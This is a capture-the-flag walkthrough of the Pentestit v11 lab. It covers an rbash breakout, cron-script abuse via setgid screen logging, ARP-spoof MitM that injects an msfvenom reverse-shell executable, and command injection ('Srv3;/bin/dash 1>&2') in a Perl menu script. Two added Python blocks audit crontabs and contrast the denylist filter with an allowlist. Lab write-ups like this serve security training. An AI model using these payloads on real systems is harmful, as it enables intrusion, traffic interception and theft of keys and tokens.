Innogen security

Pentestit lab v11 Guide Part 6

 

Site 1 192.168.10/11/12 networks

Testing SSH logins across the .10 and .11 networks for user john, using the password found on the helpdesk box, we land back on the helpdesk server, 192.168.11.3.


root@kali:~/vpn$ ssh john@192.168.11.3
The authenticity of host '192.168.11.3 (192.168.11.3)' can't be established.
ECDSA key fingerprint is SHA256:eCUUbPi982duUnl4Z2icxjpvjroDyEr/7Q567c6j0gs.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '192.168.11.3' (ECDSA) to the list of known hosts.
john@192.168.11.3's password: 
Last login: Wed Jul 12 16:55:54 2017 from 192.168.11.254
##########################
PasswordAuthentication no
        PasswordAuthentication yes
##########################
john@tl11-192-168-11-3:~$

 

SCREEN – 192.168.11.3:

While enumerating this host, tab completion in the shell throws errors that show we are in a jail shell:


john@tl11-192-168-11-3:~$ ls -al
total 28
drwxr-xr-x 2 root root 4096 Jul  5 15:39 .
drwxr-xr-x 4 root root 4096 Jun 24 14:23 ..
-r-------- 1 root root    0 Jul  5 15:39 .bash_history
-r--r--r-- 1 root root  220 Apr 20 22:09 .bash_logout
-r--r--r-- 1 root root 3515 Apr 20 22:09 .bashrc
-r-------- 1 root root   44 Jun 24 15:32 .lesshst
-r--r--r-- 1 root root  675 Apr 20 22:09 .profile
-r-------- 1 root root 3954 Jul  5 15:39 .viminfo
john@tl11-192-168-11-3:~$ cat .lesshst
cat: .lesshst: Permission denied
john@tl11-192-168-11-3:~$ cat -rbash: /dev/null: restricted: cannot redirect output
bash: _upvars: `-a2': invalid number specifier
-rbash: /dev/null: restricted: cannot redirect output
bash: _upvars: `-a0': invalid number specifier

The env command shows we are in rbash (restricted bash). This is one of the easiest jails to break out of; I run the following to spawn an unrestricted bash shell:


john@tl11-192-168-11-3:~$ python -c "import pty;pty.spawn('/bin/bash')"
##########################
PasswordAuthentication no
        PasswordAuthentication yes
##########################
john@tl11-192-168-11-3:~$

After a great deal of enumeration we find this line in the /etc/crontab file:

 

## Check
*  * 	* * *	tester	/home/tester/check.pl /build/log/*

Enumerating this directory we find /build/log is empty and the /build directory holds the source files for the screen binary. Note that the screen binary has the setgid bit set for utmp:

As the listing below shows, /build/log is writable only by root and the utmp group, so to exploit the cron job we first need to write there as utmp; whether that is enough also depends on the script's source.


john@tl11-192-168-11-3:~$ ls -al /build/log/
total 8
drwxrwxr-x 2 root utmp 4096 Jul 12 16:57 .
drwxr-xr-x 4 root root 4096 Jun 24 17:07 ..

We now look at the script found in the crontab: /home/tester/check.pl:

 

#!/usr/bin/perl -w

# Only act on a regular file (not a symlink) handed over by the cron glob
if (!-l $ARGV[0] && -f $ARGV[0]) {

	# The first line of the dropped file is taken as a path to read
	open $file1, $ARGV[0];
	$fname = <$file1>;
	chomp($fname);

	# Open that path and append its first line to /tmp/testlog
	open ($file2, $fname) or die("$!");
	open $file3, '>>', "/tmp/testlog";
	$line = <$file2>;

	chomp ($line);
	print $file3 $line, "\n";
	
	close $file2;
	close $file3;
	close $file1;
	# Remove the dropped file from /build/log
	unlink($ARGV[0]);

	# One second later, truncate /tmp/testlog again
	sleep(1);
	open $file1, '>', "/tmp/testlog";
	close $file1;

}
else {
	exit(0);
}

Reading the Perl script: it takes a file from /build/log, reads its first line as a filename, opens that file, writes its first line into /tmp/testlog, and then deletes (unlink) the original file from /build/log. So if we can drop a file into /build/log containing the path of the token, the cron job should copy the token's contents into /tmp/testlog for us.

After a great deal of research we find it is possible to make the screen binary write its log file to a location of our choosing:

man screen: -L            Turn on output logging.

We can now do the following:

  • Execute the setgid screen binary with the -L switch so the log lands in /build/log, then detach with Ctrl-a d
  • chmod the log file so the cron job hits no permission issues
  • echo the path of the target file into the log file
  • run a loop watching /tmp/testlog as shown; this yields the Screen TOKEN.
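What makes this cron job exploitable is the combination of a job run as one user (tester) over a glob in a directory that a different, non-root group (utmp) can write to, plus a setgid binary able to write there. The audit script below is added here and is not part of the original post or the lab: it parses /etc/crontab-style entries, finds glob arguments, and flags jobs whose input directory is group- or other-writable, using a constructed fixture tree so the check runs offline.

```python
import os, re, stat, tempfile

# Constructed /etc/crontab text modelled on the entry found in the lab (not the lab's file).
CRONTAB_SAMPLE = """# m h dom mon dow user command
*  * \t* * *\ttester\t/home/tester/check.pl /build/log/*
0  3 \t* * *\troot\t/opt/scripts/upd.sh
"""

# Matches a glob argument such as /build/log/* and captures the directory it expands over.
GLOB_ARG = re.compile(r"^(/[^\s*?\[]*)/[*?\[].*$")

def parse_system_crontab(text):
    """Return [(user, command)] for each job line of a system crontab (5 time fields + user)."""
    jobs = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split(None, 6)
        if len(fields) == 7:
            jobs.append((fields[5], fields[6]))
    return jobs

def glob_dirs(command):
    """Directories that the command's glob arguments expand over."""
    return [m.group(1) for m in map(GLOB_ARG.match, command.split()) if m]

def writable_by_group_or_other(path):
    """True when group or other can create files there, as with drwxrwxr-x root utmp."""
    return bool(os.stat(path).st_mode & (stat.S_IWGRP | stat.S_IWOTH))

def audit(text, root="/"):
    """Return [(user, dir)] for jobs whose glob input directory is writable by group/other.
    `root` lets the check run against a fixture tree instead of the live filesystem."""
    findings = []
    for user, cmd in parse_system_crontab(text):
        for d in glob_dirs(cmd):
            real = os.path.join(root, d.lstrip("/"))
            if os.path.isdir(real) and writable_by_group_or_other(real):
                findings.append((user, d))
    return findings

def demo():
    """Build a fixture mirroring the post's drwxrwxr-x /build/log and audit the sample crontab."""
    with tempfile.TemporaryDirectory() as root:
        log = os.path.join(root, "build", "log")
        os.makedirs(log)
        os.chmod(log, 0o775)  # group-writable, like the lab's utmp-group directory
        return audit(CRONTAB_SAMPLE, root)
```

Run audit() with the default root against a live box's /etc/crontab to list the jobs worth a closer look; the fix is to make the input directory writable only by the job's own user.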

 

ROUTER:

In front of the three subnetworks is the router, .252, which we can reach via our morgan user and RSA key. It would be useful, however, to have something that lets us navigate and scan the networks without proxychains, which can be cumbersome. On asking around I was pointed to sshuttle, which maps multiple networks over SSH with the following command:

sshuttle -r morgan@172.16.0.252 -e "ssh -i ~/pentestit/morgan.key" 192.168.10.0/24 192.168.11.0/24 192.168.12.0/24

 

DIRECTOR – 192.168.12.2:

On connecting to the Intercepter-NG machine with the credentials obtained from the AD file share, we look around for the Intercepter software, which is located in C:\Soft:

 

It is worth noting there is also a netcat binary here, which may be useful.

Firing up Intercepter we run a quick scan of the subnet and set up our target, gateway and stealth addresses. As the initial enumeration of this subnet did not yield much information, we work logically and set the following options:

  • Target: 192.168.12.1, because it is the first IP in the subnet.
  • Gateway: 192.168.12.3, because it is a known host in the subnetwork.
  • Stealth: 192.168.12.4, because it showed up on the scan but was not on the lab map, so we assume it is the stealth host to use for our MitM attack.

NB: The following video will help you understand Intercepter:

We now start our ARP spoofing/MitM attack on the subnet and open the raw tab to view the traffic in Wireshark format. At first we get a mass of RDP session data from our own connection, so we need to filter it out.

To do this we stop the spoof, go to the raw tab and enter the following in the bottom-left pcap filter: not port 3389

Once done we head back, start the spoof again and go make coffee :D. Back at the desk we review the captures and look for the obvious information first, i.e. FTP or HTTP connections.

After reading through quite a number of dead-end HTTP requests we find one that stands out: a repeated GET request for a binary, quake3.exe, which is returning a 404 response.

Based on this we can potentially serve the victim a quake3.exe of our own, in this case an msfvenom reverse shell:

msfvenom -p windows/shell_reverse_tcp LHOST=192.168.12.2 LPORT=80 -f exe > quake3.exe

To transfer it, rather than reconnect over RDP and risk losing my spot to a competing connection, I created a file share on the Intercepter host and used smbclient from my Kali machine to copy quake3.exe across.

Once there I proceed to do the following:

  • Select MiM attacks, check the SSL Strip option and OK to close
  • Select Injection and provide the following values:
    • pattern: quake3
    • content type drop down: application/octet-stream
    • count: 10
    • user-agent: *
    • Add: select the reverse shell binary

We start netcat on our machine listening on port 80, matching the msfvenom command:

nc.exe -nlvp 80

then start the ARP spoofing again and wait for the injection to spawn our reverse shell, which did not take long at all.

Navigating around the 192.168.12.1 machine we find it belongs to the Director; we find a public key and the token in the Director's Documents folder:

Public Key:

Now we have another ssh key and username we can use:

ssh remote@192.168.11.1 -i ~/pentestit/remote_pub.key

NOTE: Before exiting the Intercepter host, enumerate the user's Documents directory, where a todo.txt is found containing a number of crontab entries:

 

Run this scripts to check locked accounts requlary
Garry said somthing about ftp server moving...need to correct script parameter when it's done.
!!!ASK on Monday!!!

# m h  dom mon dow   command
*/2 * * * * su - checker -c 'python /home/checker/ftpclient.py 192.168.11.18 2030 5 user password' > /dev/null 2>&1
*/3 * * * * su - checker -c 'python /home/checker/ftpclient.py 192.168.10.1 2020 5 user password' > /dev/null 2>&1
*/4 * * * * su - checker -c 'python /home/checker/httpclient.py 172.16.0.11 80 5 user password' > /dev/null 2>&1
*/5 * * * * su - checker -c 'python /home/checker/httpclient.py 172.16.0.11 88 5 user password' > /dev/null 2>&1
*/6 * * * * su - checker -c 'python /home/checker/ftpclient.py 172.16.0.16 2010 5 user password' > /dev/null 2>&1
*/7 * * * * su - checker -c 'python /home/checker/httpclient.py 172.16.0.17 80 5 user password' > /dev/null 2>&1

 

REMOTE – 192.168.11.1:

Using the public key found we connect to remote and are presented with an options screen; selecting the two options, Srv1 and Srv2, gives two different results:

  • Srv1: lets us in as user "aengineer", so I make a note of this for future use.
  • Srv2: just gives a blank screen, a dead end.

 

root@kali:~/pentestit$ ssh remote@192.168.11.1 -i remote.11.1.key 
########################################
Enter ServerName or Q for exit:
########################################
Srv1
Srv2
########################################
Enter VM name for connect: Srv1
Connecting to server …
Last login: Tue Jul  4 23:07:52 2017 from 192.168.11.1
##########################
PasswordAuthentication no
##########################
idaengineer@tl11-172-16-0-16:~$ id
uid=1001(aengineer) gid=1001(aengineer) groups=1001(aengineer)
aengineer@tl11-172-16-0-16:~$ 

Connection to 172.16.0.16 closed.
########################################
Enter ServerName or Q for exit:
########################################
Srv1
Srv2
########################################
Enter VM name for connect: Srv2
Connecting to server ...

I accidentally make a typo in the options screen, notice an error message, start attempting redirection of stdout and stderr, and find that command injection is available.
NOTE: I have truncated this, as my attempts were much more involved; this link proved very useful:
https://unix.stackexchange.com/questions/164217/write-to-stderr

 

Enter VM name for connect: Srv3
cat: /opt/gh/Srv3: No such file or directory
########################################
Enter ServerName or Q for exit:
########################################
Srv1
Srv2
########################################
Enter VM name for connect: 
Enter VM name for connect: Srv3;id>/dev/null
cat: /opt/gh/Srv3: No such file or directory
########################################
Enter ServerName or Q for exit:
########################################
Srv1
Srv2
########################################
Enter VM name for connect: Srv3; id 1>&2
cat: /opt/gh/Srv3: No such file or directory
uid=1000(remote) gid=1000(remote) groups=1000(remote)

Attempting to execute /bin/sh and /bin/bash returned no results; however, /bin/dash produced a shell:

 

########################################
Enter ServerName or Q for exit:
########################################
Srv1
Srv2
########################################
Enter VM name for connect: Srv3; /bin/dash 1&>2
cat: /opt/gh/Srv3: No such file or directory
sh: 1: cannot create 2: Permission denied
/bin/dash: 0: Can't open 1
########################################
Enter ServerName or Q for exit:
########################################
Srv1
Srv2
########################################
Enter VM name for connect: Srv3;/bin/dash 1>&2
cat: /opt/gh/Srv3: No such file or directory
$ ls -al

total 28
drwxr-xr-x 3 root remote 4096 Jun 29 18:17 .
drwxr-xr-x 3 root root   4096 Jun 30 16:41 ..
-rw------- 1 root remote  252 Jun 29 18:57 .bash_history
-rw-r--r-- 1 root remote  220 Dec 30  2012 .bash_logout
-rw-r--r-- 1 root remote 3515 Nov  6  2016 .bashrc
-rw-r--r-- 1 root remote  675 Dec 30  2012 .profile
drwxr-x--- 2 root remote 4096 Jul  5 00:40 .ssh

SSH KEY Found:

 

$ $ ls -al .ssh	
total 24
drwxr-x--- 2 root   remote 4096 Jul  5 00:40 .
drwxr-xr-x 3 root   remote 4096 Jun 29 18:17 ..
-r-x------ 1 remote root    938 Jul  6 17:19 authorized_keys
-r-x------ 1 remote root   1679 Jun 29 18:15 id_rsa
-r-x------ 1 remote root    406 Jun 29 18:15 id_rsa.pub
-r-x------ 1 remote root    444 Jul  5 00:41 known_hosts
$ cat .ssh/id_rsa

I decide to check out the directory seen in the error message during login:

cat: /opt/gh/Srv3: No such file or directory

 

$ ls -al /opt/gh/
total 20
drwxr-xr-x 2 root remote 4096 Jul  5 00:19 .
drwxr-xr-x 4 root remote 4096 Jun 29 18:58 ..
-rwxr-xr-x 1 root root   1273 Jul  7 09:29 gh.pl
-rw-r--r-- 1 root root     12 Jun 29 19:01 Srv1
-rw-r--r-- 1 root root     13 Jul  5 00:19 Srv2
$ cat /opt/gh/gh.pl
#!/usr/bin/perl

## USE
#use strict;
#use warnings;

## ENV
my $path = "/opt/gh/";
my $home = "/home/".`whoami`;
chomp($home);

## Go-go-go
while () {
# system("clear");
 print "########################################\n";
 print "Enter ServerName or Q for exit:\n";
 print "########################################\n";
 print "Srv1\n";
 print "Srv2\n";
 print "########################################\n";

 print "Enter VM name for connect: ";
 my $choice = <STDIN>;
 chomp ($choice);

 $choice =~ s/\.\.//g;
 $choice =~ s/(.*bash)|( sh|\/sh)//g;

 my $srv_conf	= $path.$choice;

 ## for right choice
 if ( "$choice" =~ /^Srv/ ) {
  ## Check that file exist
  if (( ! -e "$srv_conf") && ( "$choice" =~ /$home/ )) {
   my $srv_ip = `cat $srv_conf`;
   print "Server IP: $srv_ip";
   next; 
  }

  ## Get Srv IP from file
  my $srv_ip = `cat $srv_conf`;

  # Check Srv IP
  if ( "$srv_ip" =~ /^\d+\.\d+\.\d+\.\d+$/ ) {
 
   print "Connecting to server ...\n";

   ## SSH connect
   system("clear");

   ## and connect to server
   system("ssh -i /home/remote/.ssh/id_rsa -o StrictHostKeyChecking=no aengineer\@$srv_ip");
  }

 undef $choice;
 }
 ## for exit
 if (( "\U$choice" eq 'Q' ) || ( $choice eq 'quit') || ( $choice eq 'exit' )) { exit; }
}

system("logout");
exit;
$ ls -al /opt/scripts	
total 12
drwxr-xr-x 2 root remote 4096 Jun 30 11:17 .
drwxr-xr-x 4 root remote 4096 Jun 29 18:58 ..
-rwxr-xr-x 1 root remote   50 Apr 20  2016 upd.sh
$ cat /opt/scripts/upd.sh
#!/bin/bash

apt-get update && apt-get upgrade -y
$ ls -al/opt
ls: invalid option -- '/'
Try 'ls --help' for more information.
$ ls -al /opt
total 16
drwxr-xr-x  4 root remote 4096 Jun 29 18:58 .
drwxr-xr-x 22 root root   4096 Apr  1 22:18 ..
drwxr-xr-x  2 root remote 4096 Jul  5 00:19 gh
drwxr-xr-x  2 root remote 4096 Jun 30 11:17 scripts
$ ls -al /opt/gh/Srv1
-rw-r--r-- 1 root root 12 Jun 29 19:01 /opt/gh/Srv1
$ ls -al /opt/gh/Srv2
-rw-r--r-- 1 root root 13 Jul  5 00:19 /opt/gh/Srv2
$

From the perl script we find the connection string with the aengineer username:

 

## and connect to server
   system("ssh -i /home/remote/.ssh/id_rsa -o StrictHostKeyChecking=no aengineer\@$srv_ip");
  }
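Why the filter in gh.pl let the dash payload through while sh and bash failed: it strips a denylist of substrings and then only checks that the result still starts with Srv before using it in a backtick `cat`. The block below is added here and is not part of the post or the lab: it reimplements gh.pl's two substitutions in Python to show exactly what reaches the shell, and contrasts them with an allowlist check (the regex `^Srv[0-9]+$` is my assumed fix) that validates the name before it is used to build a filename for open(), with no shell involved.

```python
import re

# gh.pl's two substitutions, translated from Perl `s///g` to Python re.sub.
DENYLIST = [
    (re.compile(r"\.\."), ""),
    (re.compile(r"(.*bash)|( sh|/sh)"), ""),
]
# Assumed hardening (not in the lab's script): only a bare server name is acceptable.
ALLOWLIST = re.compile(r"^Srv[0-9]+$")

def lab_filter(choice):
    """Apply gh.pl's substitutions and return the string it would hand to `cat`."""
    for pattern, repl in DENYLIST:
        choice = pattern.sub(repl, choice)
    return choice

def lab_accepts(choice):
    """gh.pl runs `cat /opt/gh/<choice>` whenever the filtered value still starts with Srv."""
    return lab_filter(choice).startswith("Srv")

def allowlist_accepts(choice):
    """Reject anything that is not a plain server name matching the allowlist."""
    return ALLOWLIST.match(choice) is not None

def resolve_server_file(choice, path="/opt/gh/"):
    """Hardened equivalent: validate first, then build the path for open(); no shell is used."""
    if not allowlist_accepts(choice):
        return None
    return path + choice
```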

According to the lab network diagram we have exploited most systems here, minus the admin network and the access control system, so armed with our new SSH user and key it is time to move into the admin network.

PART 7:
